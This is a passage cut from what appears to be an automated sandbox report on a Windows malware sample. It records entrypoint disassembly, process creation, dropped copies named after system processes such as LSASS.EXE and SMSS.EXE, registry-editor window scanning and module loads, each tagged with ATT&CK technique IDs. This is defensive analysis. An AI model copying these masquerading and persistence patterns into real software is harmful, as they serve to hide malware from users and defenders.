[eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE473F.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"MrD3_08.scr\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4741.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e8168@ADVAPI32.dll\"\n \"0e000f00703f8168@ADVAPI32.dll\"\n \"0e000f00cc3f8168@ADVAPI32.dll\"\n \"11001200b4478168@ADVAPI32.dll\"\n \"1100120048488168@ADVAPI32.dll\"\n \"120013008c488168@ADVAPI32.dll\"\n \"12001300e4488168@ADVAPI32.dll\"\n \"14001500dc6f8168@ADVAPI32.dll\"\n \"14001500f46f8168@ADVAPI32.dll\"\n \"140015000c708168@ADVAPI32.dll\"\n \"1700180024708168@ADVAPI32.dll\"\n \"0d000e003c708168@ADVAPI32.dll\"\n \"110012004c708168@ADVAPI32.dll\"\n \"1100120060708168@ADVAPI32.dll\"\n \"0f001000a0718168@ADVAPI32.dll\"\n \"14001500e0718168@ADVAPI32.dll\"\n \"14001500f8718168@ADVAPI32.dll\"\n \"0c000d0040728168@ADVAPI32.dll\"\n \"0c000d0050728168@ADVAPI32.dll\"\n \"0e000f0060728168@ADVAPI32.dll\"\n \"0e000f0070728168@ADVAPI32.dll\"\n \"0b000c0080728168@ADVAPI32.dll\"\n \"18001900b8748168@RPCRT4.dll\"\n \"13001400e4748168@RPCRT4.dll\"\n \"14001500f8748168@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for class \"RegEdit_RegEdit\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for window \"Registry Editor\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for window \"Folder Options\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for window \"Local Settings\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for class \"ExploreWClass\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for class \"CabinetWClass\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for class \"RebarWindow32\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for class \"ComboBoxEx32\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for class \"ComboBox\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for class \"Edit\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00005884)\n \"D3_08.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005856)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005856)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00002060)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006124)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005984)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004084)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00001800)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004152)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005884)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005856)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005856)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005856)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005856)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005856)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005856)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005856)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00002060)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71410000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"KERNEL32\" at base 76da0000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73b90000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"OLEAUT32.DLL\" at base 76c30000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"SXS.DLL\" at base 74c90000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"CRYPTSP.DLL\" at base 74790000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74520000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"ADVAPI32.DLL\" at base 75cb0000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c80000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"DWMAPI.DLL\" at base 73920000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"KERNEL32.DLL\" at base 76da0000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"SHELL32.DLL\" at base 75e40000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"OLE32.DLL\" at base 755a0000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"COMCTL32.DLL\" at base 73c80000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"CLBCATQ.DLL\" at base 75510000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73a80000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"NTMARTA.DLL\" at base 74200000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76da0000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"SETUPAPI.DLL\" at base 76a90000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"RPCRT4.DLL\" at base 75450000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"USER32\" at base 76cd0000\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74c30000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74520000\n \"D3_08.exe\" loaded module \"ADVAPI32.DLL\" at base 75cb0000\n \"D3_08.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c80000\n \"D3_08.exe\" loaded module \"DWMAPI.DLL\" at base 73920000\n \"D3_08.exe\" loaded module \"KERNEL32.DLL\" at base 76da0000\n \"D3_08.exe\" loaded module \"SHELL32.DLL\" at base 75e40000\n \"D3_08.exe\" loaded module \"OLE32.DLL\" at base 755a0000\n \"D3_08.exe\" loaded module \"COMCTL32.DLL\" at base 73c80000\n \"D3_08.exe\" loaded module \"OLEAUT32.DLL\" at base 76c30000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76da0000\n \"D3_08.exe\" loaded module \"SETUPAPI.DLL\" at base 76a90000\n \"D3_08.exe\" loaded module \"RPCRT4.DLL\" at base 75450000\n \"D3_08.exe\" loaded module \"CLBCATQ.DLL\" at base 75510000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73a80000\n \"D3_08.exe\" loaded module \"NTMARTA.DLL\" at base 74200000\n \"D3_08.exe\" loaded module \"USER32\" at base 76cd0000\n \"D3_08.exe\" loaded module \"KERNEL32\" at base 76da0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74c30000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 74c90000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 74790000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74520000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 75cb0000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c80000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 73920000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 76da0000\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 76da0000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 75e40000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 755a0000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 73c80000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 76c30000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76da0000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 75510000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 76a90000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 75450000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73a80000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74200000\n \"IExplorer.exe\" loaded module \"USER32\" at base 76cd0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74c30000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71410000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"D3_08.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 688b0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73b90000\n \"D3_08.exe\" loaded module \"SXS.DLL\" at base 74c90000\n \"D3_08.exe\" loaded module \"CRYPTSP.DLL\" at base 74790000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71410000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73b90000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71410000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 76da0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73b90000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 76c30000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 74c90000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 74790000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74520000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 75cb0000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 74c80000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 76da0000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 75e40000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 755a0000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 73c80000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 75510000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73a80000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74200000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76da0000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 76a90000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 75450000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 76cd0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74c30000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 688b0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73b90000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76c30000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 74c90000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74790000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74520000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 75cb0000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 74c80000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73920000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76da0000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 75e40000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 755a0000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 73c80000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76da0000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76a90000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 75450000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75510000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73a80000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74200000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 76cd0000\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 76da0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74c30000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71410000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n 